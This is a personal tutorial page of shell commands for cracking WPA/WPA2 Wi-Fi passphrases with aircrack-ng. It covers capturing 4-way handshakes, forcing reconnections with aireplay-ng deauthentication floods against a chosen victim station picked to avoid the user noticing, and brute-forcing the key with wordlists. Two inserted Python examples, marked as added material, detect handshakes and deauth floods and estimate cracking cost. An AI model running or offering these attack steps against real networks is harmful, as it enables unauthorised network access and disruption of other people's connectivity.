Cracking WPA/WPA2 with Aircrack-NG

this assumes you already have some password dictionaries at hand

see aircrack-obsolete for sniffing OPN and cracking WEP setups

Install

Ubuntu

apt install aircrack-ng wifite ieee-data
airodump-ng-oui-update

or from source

Get ready

what kind of WLAN interface do you have?

ifconfig -a
iwconfig

have a quick look at the strongest available SSIDs before you proceed

ifconfig wlan0 up
iwlist wlan0 scan | grep SSID | head

check that nothing is interfering with the interface, and kill those processes if needed

systemctl stop avahi-daemon
systemctl disable avahi-daemon

systemctl stop avahi-daemon.socket
systemctl disable avahi-daemon.socket

pkill dhclient
pkill wpa_supplicant
pkill avahi-daemon

airmon-ng check
airmon-ng check kill

Monitor mode

switch to monitor mode instead of managed mode. this is optional, as airodump-ng turns the NIC into a sniffer anyhow.

you might notice that enabling promiscuous mode makes no difference on a WLAN controller

    ifconfig wlan0 promisc

the right way would rather be

    iwconfig wlan0 mode Monitor

but let’s use the dedicated airmon tool we’ve got here. I am not sure why it changes the name of the sniffer interface.

airmon-ng start wlan0
iwconfig
ifconfig

Who’s there?

check which APs and SSIDs are there, and now look more precisely for associated stations

airodump-ng --manufacturer --uptime --wps -a wlan0mon
# --ignore-negative-one
q q

be it for WEP or for WPA/WPA2, you need to see some stations, otherwise you won’t get any WEP traffic for IVs, and hardly any WPA/WPA2 authentication handshake either.

select an SSID with PSK in the AUTH column, and then look at it more closely, without noise from other networks and without channel hopping

#mac=AP-MAC-ADDRESS-HERE
chan=CHANNEL-HERE
ssid=SSID-HERE

also choose a victim station – preferably the most idle one, to avoid being noticed by the user

station=STATION-MAC-ADDRESS-HERE

Capture 4-way handshakes

    mkdir -p ~/crack/
    cd ~/crack/

    echo $chan
    echo $ssid

mkdir $ssid/
cd $ssid/
rm -f $ssid-*
airodump-ng --manufacturer --uptime --wps -a --channel $chan \
    --essid $ssid --write $ssid wlan0mon
    # --bssid $mac --write $mac wlan0mon

and wait for the notice of a captured handshake to appear in the upper-right corner

you can also check with the wireshark CLI

tshark -r $ssid-01.cap ...TODO...

you may otherwise speed up the acquisition of 4-way handshakes by de-authenticating stations. a single deauth packet is usually enough – you then need to wait about 3 seconds for the supplicant to reconnect.

make sure the SAME SSID variable is defined in THAT OTHER TERMINAL…

echo $ssid
echo $station

aireplay-ng -e $ssid -s $station -c $station --deauth 1 wlan0mon
# --or-- -a $mac

otherwise increase the number of deauth packets sent, if needed

aireplay-ng -e $ssid -s $station -c $station --deauth 20 wlan0mon
# -g 9 -R --deauth-rc 9

and as a last resort, in case no handshake gets captured at all

aireplay-ng -e $ssid --deauth 0 wlan0mon
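
two things worth checking in the resulting capture file: whether it really holds all four EAPOL-Key messages of a handshake (what airodump-ng's upper-right notice claims, and what the tshark check above is meant to confirm), and, from the defender's side, whether the capture shows the kind of deauth burst that aireplay-ng produces. the following is an added example, not code from this page nor from the aircrack-ng project: a small pure-Python pcap reader that does both. it assumes a classic little-endian pcap with link type 105 (raw 802.11 frames, no radiotap header, i.e. what you get after stripping radiotap in wireshark or when the driver delivers bare 802.11), and it ships with a constructed sample capture so it runs offline; the MAC addresses and timestamps in that sample are made up. on a network with 802.11w (PMF) enabled, forged deauth frames are dropped by the stations, so the flood detector is only relevant for networks without it.

```python
"""Added example: inspect an 802.11 pcap for 4-way handshake messages and
deauth/disassoc floods (pure Python, no scapy/tshark needed).  Assumes a classic
little-endian pcap with link type 105 (raw 802.11 frames, no radiotap header)."""
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105
EAPOL_ETHERTYPE = b"\x88\x8e"
LLC_SNAP = b"\xaa\xaa\x03\x00\x00\x00"
# EAPOL-Key "Key Information" flag bits (IEEE 802.11i)
KEY_INFO_INSTALL, KEY_INFO_ACK, KEY_INFO_MIC, KEY_INFO_SECURE = 0x0040, 0x0080, 0x0100, 0x0200

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def iter_pcap(data):
    """Yield (timestamp, frame) for every record of the pcap."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", data[:24])
    if magic != 0xA1B2C3D4 or linktype != LINKTYPE_IEEE802_11:
        raise ValueError("need a little-endian pcap with raw 802.11 frames (link type 105)")
    off = 24
    while off + 16 <= len(data):
        sec, usec, incl_len, _ = struct.unpack("<IIII", data[off:off + 16])
        off += 16
        yield sec + usec / 1e6, data[off:off + incl_len]
        off += incl_len

def parse_frame(frame):
    """Classify a frame as deauth/disassoc or EAPOL-Key message; None for anything else."""
    if len(frame) < 24:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    to_ds, from_ds = frame[1] & 0x01, (frame[1] >> 1) & 0x01
    addr1, addr2 = mac(frame[4:10]), mac(frame[10:16])
    if ftype == 0 and subtype in (10, 12):        # management: disassoc (10) / deauth (12)
        return {"kind": "deauth", "src": addr2, "dst": addr1}
    if ftype != 2:                                # only data frames carry EAPOL
        return None
    hdr = 24 + (6 if to_ds and from_ds else 0) + (2 if subtype & 0x8 else 0)  # addr4 / QoS control
    body = frame[hdr:]
    if len(body) < 15 or body[:6] != LLC_SNAP or body[6:8] != EAPOL_ETHERTYPE:
        return None
    eapol = body[8:]                              # EAPOL: version, type, length, then key descriptor
    if eapol[1] != 3:                             # packet type 3 = EAPOL-Key
        return None
    key_info = struct.unpack(">H", eapol[5:7])[0]
    ack, mic = key_info & KEY_INFO_ACK, key_info & KEY_INFO_MIC
    if ack and not mic:
        msg = 1                                   # AP -> STA: ANonce
    elif ack and mic and key_info & KEY_INFO_INSTALL:
        msg = 3                                   # AP -> STA: install PTK, GTK
    elif mic and not ack:
        msg = 4 if key_info & KEY_INFO_SECURE else 2   # STA -> AP: SNonce+MIC (2) or final ack (4)
    else:
        msg = 0
    # from the AP (FromDS) addr2 is the BSSID and addr1 the station; from the station it is reversed
    bssid, station = (addr2, addr1) if from_ds else (addr1, addr2)
    return {"kind": "eapol", "bssid": bssid, "station": station, "msg": msg}

def handshake_messages(data):
    """(bssid, station) -> set of 4-way message numbers present in the capture."""
    seen = defaultdict(set)
    for _, frame in iter_pcap(data):
        info = parse_frame(frame)
        if info and info["kind"] == "eapol" and info["msg"]:
            seen[(info["bssid"], info["station"])].add(info["msg"])
    return dict(seen)

def complete_handshakes(data):
    """Pairs for which all four messages were captured."""
    return sorted(k for k, msgs in handshake_messages(data).items() if msgs == {1, 2, 3, 4})

def deauth_floods(data, threshold=10, window=5.0):
    """Claimed transmitters sending >= threshold deauth/disassoc frames within `window` seconds.
    A forged deauth carries a spoofed source (usually the AP's own address), so the flagged
    address is the impersonated one, not the attacker's."""
    stamps = defaultdict(list)
    for ts, frame in iter_pcap(data):
        info = parse_frame(frame)
        if info and info["kind"] == "deauth":
            stamps[info["src"]].append(ts)
    flagged = {}
    for src, times in stamps.items():
        times.sort()
        for i, start in enumerate(times):
            burst = sum(1 for t in times[i:] if t - start <= window)
            if burst >= threshold:
                flagged[src] = max(flagged.get(src, 0), burst)
    return flagged

# --- constructed sample capture, not a real recording (made-up MACs and timestamps) ----
AP, STA1, STA2, BCAST = (bytes.fromhex(h) for h in ("020000000001", "020000000011", "020000000012", "ff" * 6))

def _record(ts, frame):
    sec = int(ts)
    return struct.pack("<IIII", sec, round((ts - sec) * 1e6), len(frame), len(frame)) + frame

def _deauth(dst, src, bssid):
    return bytes([0xC0, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + b"\x00\x07"

def _eapol_key(from_ap, ap, sta, key_info):
    fc = bytes([0x08, 0x02 if from_ap else 0x01])        # data frame, FromDS or ToDS
    hdr = fc + b"\x00\x00" + (sta + ap if from_ap else ap + sta) + ap + b"\x00\x00"
    eapol = struct.pack(">BBHBH", 2, 3, 95, 2, key_info) + b"\x00" * 93   # RSN key descriptor, rest zeroed
    return hdr + LLC_SNAP + EAPOL_ETHERTYPE + eapol

def build_sample_pcap():
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    recs = [_record(100.0 + i * 0.1, _deauth(BCAST, AP, AP)) for i in range(12)]  # forged flood "from" the AP
    for i, (from_ap, ki) in enumerate(((True, 0x008A), (False, 0x010A), (True, 0x13CA), (False, 0x030A))):
        recs.append(_record(103.0 + i * 0.01, _eapol_key(from_ap, AP, STA1, ki)))    # STA1: full handshake
    recs.append(_record(104.0, _eapol_key(True, AP, STA2, 0x008A)))                  # STA2: messages 1-2 only
    recs.append(_record(104.1, _eapol_key(False, AP, STA2, 0x010A)))
    recs.append(_record(140.0, _deauth(AP, STA2, AP)))                                 # STA2 leaving: one legit deauth
    return hdr + b"".join(recs)

if __name__ == "__main__":
    cap = build_sample_pcap()
    print("handshake messages:", handshake_messages(cap))
    print("complete:", complete_handshakes(cap))
    print("deauth floods:", deauth_floods(cap))
```

to run it on a real file, replace build_sample_pcap() with open("$ssid-01.cap", "rb").read() after converting the capture to link type 105 (or extend parse_frame to skip the radiotap header, whose length sits in bytes 2-3). the message classification relies on the Key Information flags only (ACK, MIC, Install, Secure), which is enough to tell the four messages apart without verifying any MIC; a pair that only ever shows messages 1 and 2 is the usual sign that the station was deauthenticated but never finished reconnecting.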

Brute-force WPA/WPA2 PSK

possibly on a remote server, where heavy CPU load and fan noise won’t bother you…

passlist=/usr/share/wordlists/10-million-password-list-top-1000000.txt # atom 5m14.282s
passlist=/usr/share/wordlists/rockyou.txt # ryzen 12m58,339s vs. atom 74m53.226s
echo $ssid
ls -lhF $ssid-*.cap # got several captures?
time nice aircrack-ng -w $passlist -e $ssid -a 2 $ssid-01.cap
# --or-- -b $mac
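
the timings above are dominated by one thing: each candidate passphrase has to go through PBKDF2-HMAC-SHA1 with 4096 rounds, salted with the SSID, before it can be checked against the handshake. the following is an added example, not code from this page nor from aircrack-ng, that carries that derivation through with hashlib, checks it against the IEEE 802.11i Annex H test vector ("password" / "IEEE"), and turns a measured single-core rate into worst-case durations for a wordlist and for exhaustive search. the rockyou entry count is approximate, and the SSID used for the benchmark is made up.

```python
"""Added example: the WPA/WPA2 passphrase-to-PMK derivation and a cost estimate for a
wordlist run.  Only hashlib is used; the derivation is checked against the IEEE 802.11i
Annex H test vector.  The benchmark SSID is constructed, the rockyou size approximate."""
import hashlib
import time

PBKDF2_ROUNDS = 4096   # fixed by the standard: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes)

def derive_pmk(passphrase, ssid):
    """The 32-byte PMK of a WPA-PSK network: every wordlist candidate costs exactly this."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, 32)

def measure_rate(ssid="ExampleSSID", seconds=0.5):
    """Single-core PMK derivations per second on this machine (constructed benchmark)."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        derive_pmk(f"candidate{n:08d}", ssid)
        n += 1
    return n / (time.perf_counter() - start)

def wordlist_seconds(entries, rate):
    """Worst-case time to try every entry of a wordlist at `rate` PMK/s."""
    return entries / rate

def exhaustive_seconds(alphabet_size, length, rate):
    """Worst-case time to exhaust all passphrases of a given length over an alphabet."""
    return alphabet_size ** length / rate

if __name__ == "__main__":
    # IEEE 802.11i Annex H.4.1 test vector
    assert derive_pmk("password", "IEEE").hex() == (
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    rate = measure_rate()
    print(f"{rate:,.0f} PMK/s on one core")
    print(f"rockyou (~14.3M entries): {wordlist_seconds(14_344_391, rate) / 60:.1f} min")
    print(f"8 lowercase letters:      {exhaustive_seconds(26, 8, rate) / 86400:.0f} days")
    print(f"12 letters and digits:    {exhaustive_seconds(62, 12, rate) / 86400 / 365:.2e} years")
```

two consequences follow from the derivation itself: because the SSID is the salt, precomputed PMK tables only ever cover the SSIDs they were built for, so a non-default SSID forces the full PBKDF2 cost per candidate; and because that cost is fixed, the only lever left to the network owner is the size of the search space, i.e. a passphrase that is long and not in any wordlist.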

Clean-up

Done capturing? Go back to managed (station) mode

airmon-ng stop wlan0mon
iwconfig
ifconfig

–or– if you didn’t use a dedicated sniffer interface

ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up

Troubles

18:37:10  Waiting for beacon frame (BSSID: xx:xx:...) on channel xx
18:37:20  No such BSSID available.

==> make sure you define the variables accordingly in that other terminal…

Resources

Tutorial: How to Crack WPA/WPA2 https://www.aircrack-ng.org/doku.php?id=cracking_wpa

Aircrack-ng https://github.com/aircrack-ng

inside SSID

sniff traffic on a private SSID? https://networkengineering.stackexchange.com/questions/24236/sniff-traffic-on-a-private-ssid

Sniffing traffic on a secured wifi connection https://security.stackexchange.com/questions/97480/sniffing-traffic-on-a-secured-wifi-connection

WLAN (IEEE 802.11) capture setup https://wiki.wireshark.org/CaptureSetup/WLAN

How to sniff 802.11 packets without going into monitor mode? https://security.stackexchange.com/questions/130716/how-to-sniff-802-11-packets-without-going-into-monitor-mode

4-way handshake

IEEE 802.11i-2004 https://en.wikipedia.org/wiki/IEEE_802.11i-2004

Capturing WPA/WPA2 Handshake [MIC/Hash Cracking Process] https://www.cyberpunk.rs/capturing-wpa-wpa2-handshake

decrypt wifi with key

How to Decrypt 802.11 https://wiki.wireshark.org/HowToDecrypt802.11

How to decrypt WPA traffic in Wireshark https://miloserdov.org/?p=2525

Wireshark WPA 4-way handshake https://superuser.com/questions/413225/wireshark-wpa-4-way-handshake

troubles

I couldn’t deauth any devices using aireplay-ng command in kali linux https://security.stackexchange.com/questions/197287/i-couldnt-deauth-any-devices-using-aireplay-ng-command-in-kali-linux

aireplay DeAuth not functioning https://forum.aircrack-ng.org/index.php?topic=853.0

Aireplay-ng deauth attack not working? https://forums.hak5.org/topic/42852-aireplay-ng-deauth-attack-not-working/

pmkid

Hacking Wifi using PMKID and Aircrack-ng https://kalitut.com/hacking-wifi-using-pmkid-and-aircrack-ng/

Cracking WPA2 Passwords Using the New PMKID Hashcat Attack https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/

no need for CH-1 patch

https://unix.stackexchange.com/questions/145192/aircrack-ng-shows-negative-channel

https://forum.aircrack-ng.org/index.php?topic=1378.0

https://forum.backbox.org/software-support/aireplay-ng-ignore-negative-one/

multi-wifi?

Wifi deauthentication attacks and home security https://mjg59.dreamwidth.org/53968.html

Copyright © 2024 Pierre-Philipp Braun